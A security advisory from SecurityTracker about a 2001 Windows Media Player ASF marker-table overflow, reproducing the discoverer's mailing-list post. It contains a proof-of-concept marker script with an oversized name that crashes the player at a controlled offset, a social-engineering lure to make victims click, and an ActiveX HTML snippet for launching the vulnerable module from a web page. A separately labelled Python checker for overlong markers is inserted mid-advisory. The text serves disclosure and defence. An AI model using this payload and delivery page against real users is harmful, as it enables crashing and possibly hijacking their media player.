SecurityTracker.com
Category:   Application (Multimedia)  >   Windows Media Player
Vendors:   Microsoft
Windows Media Player ASF Marker Table Overflow Lets Remote Users Crash the Player in Certain Situations
SecurityTracker Alert ID:  1002159
SecurityTracker URL:  http://securitytracker.com/id/1002159
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Aug 7 2001
Impact:   Denial of service via network
Exploit Included:  Yes  

Description:   A vulnerability was reported in Microsoft's Windows Media Player that allows a remote user to insert a script into the marker table of a media file so that the player crashes when its user clicks on the marker bar.

It is reported that a remote user can embed a long marker in a .ASF video file so that the player will crash when the player's user clicks on the marker drop-down list under the file during playback.

The following demonstration exploit script can apparently be inserted into an ASF file to trigger the vulnerability:

----8<----cut-here-----8<----
start_marker_table
0.0
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC
0.1 Click here to bypass the advertisements!
end_marker_table
----8<----cut-here-----8<----

When the user of the player clicks on the bar, the Windows Media Player will crash at offset 43434343 ("CCCC").
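
A pre-ingest check for marker scripts of the form shown above, as an added example that is not part of the original advisory or any vendor code: it parses the start_marker_table/end_marker_table block and reports marker names longer than a limit. The 64-character limit, the timestamp pattern, the joining of wrapped lines and all function names are assumptions; the advisory does not state the size of the affected buffer.

```python
import re

# Assumed limit: the advisory does not give the size of the affected buffer.
MAX_MARKER_NAME = 64
# Assumed timestamp shape, covering "0.0" as in the advisory and "h:mm:ss.f".
TIME_RE = re.compile(r"^\d+(?::\d+)*(?:\.\d+)?$")


def parse_marker_table(script):
    """Return [(time, name)] for entries inside start/end_marker_table.

    A line that does not begin with a timestamp is joined to the previous
    marker name, since mail and web archives wrap long lines.
    """
    markers, current, inside = [], None, False
    for raw in script.splitlines():
        line = raw.strip()
        if line == "start_marker_table":
            inside, current = True, None
        elif line == "end_marker_table":
            inside = False
        elif inside and line:
            head, *rest = line.split(None, 1)
            if TIME_RE.match(head):
                current = [head, rest[0] if rest else ""]
                markers.append(current)
            elif current is not None:
                current[1] += line
    return [(time, name) for time, name in markers]


def overlong_markers(script, limit=MAX_MARKER_NAME):
    """Return (time, name_length) for each marker name longer than limit."""
    return [(t, len(n)) for t, n in parse_marker_table(script) if len(n) > limit]


# Constructed sample: one wrapped, oversized marker name and one normal one.
SAMPLE = "\n".join([
    "ignored line outside the table",
    "start_marker_table",
    "0.0 " + "A" * 80,
    "A" * 120,
    "0:00:05.0 Intro",
    "end_marker_table",
])

if __name__ == "__main__":
    for time, length in overlong_markers(SAMPLE):
        print(f"marker at {time}: name is {length} chars (limit {MAX_MARKER_NAME})")
```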

It is reported that with Windows Media Player version 7, the remote user must use an ActiveX object on an HTML page to launch the vulnerable module. A demonstration example is provided below:

<OBJECT classid=CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95 id=DSPlay1
name=DSPlay1
type="application/x-oleobject">
<PARAM NAME="ShowControls" VALUE="-1">
<PARAM NAME="ShowGotoBar" VALUE="1">
<PARAM NAME="ShowStatusBar" VALUE="1">
<PARAM NAME="ControlType" VALUE="2">
<PARAM NAME="Filename" VALUE="a.asf">
<PARAM NAME="InvokeURLs" VALUE="-1">
</OBJECT>

Impact:   A remote user can create an ASF file that will cause the player to crash when the user of the player clicks on the marker bar.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/
Cause:   Boundary error
Underlying OS:  Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000)

Message History:   None.


 Source Message Contents

Subject:  MS Windows Media Player ASF Marker Buffer Overflow


I dunno if I've sent this before.

If you embed a marker long enough in an .ASF video file
you can make WMP crash when a victim clicks the
marker drop down list under the file during playback.

Use ASFCHOP.EXE to embed the following script to any
ASF file:
----8<----cut-here-----8<----
start_marker_table
0.0 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC
0.1 Click here to bypass the advertisements!
end_marker_table
----8<----cut-here-----8<----

As you can see, I used a catch to persuade the victim
to click the bar. When a victim clicks on the bar,
WMP crashes at offset 43434343 ("CCCC").

With WMP7 you have to use an ActiveX object on an HTML
page to launch the old buggy WMP module. Make sure you
set marker bar visible in the parameters. I guess it's
the parameter "ShowGotoBar".

Dummy example:

<OBJECT classid=CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95 id=DSPlay1
name=DSPlay1
type="application/x-oleobject">
    <PARAM NAME="ShowControls" VALUE="-1">
    <PARAM NAME="ShowGotoBar" VALUE="1">
    <PARAM NAME="ShowStatusBar" VALUE="1">
    <PARAM NAME="ControlType" VALUE="2">
    <PARAM NAME="Filename" VALUE="a.asf">
    <PARAM NAME="InvokeURLs" VALUE="-1">
</OBJECT>



Copyright 2021, SecurityGlobal.net LLC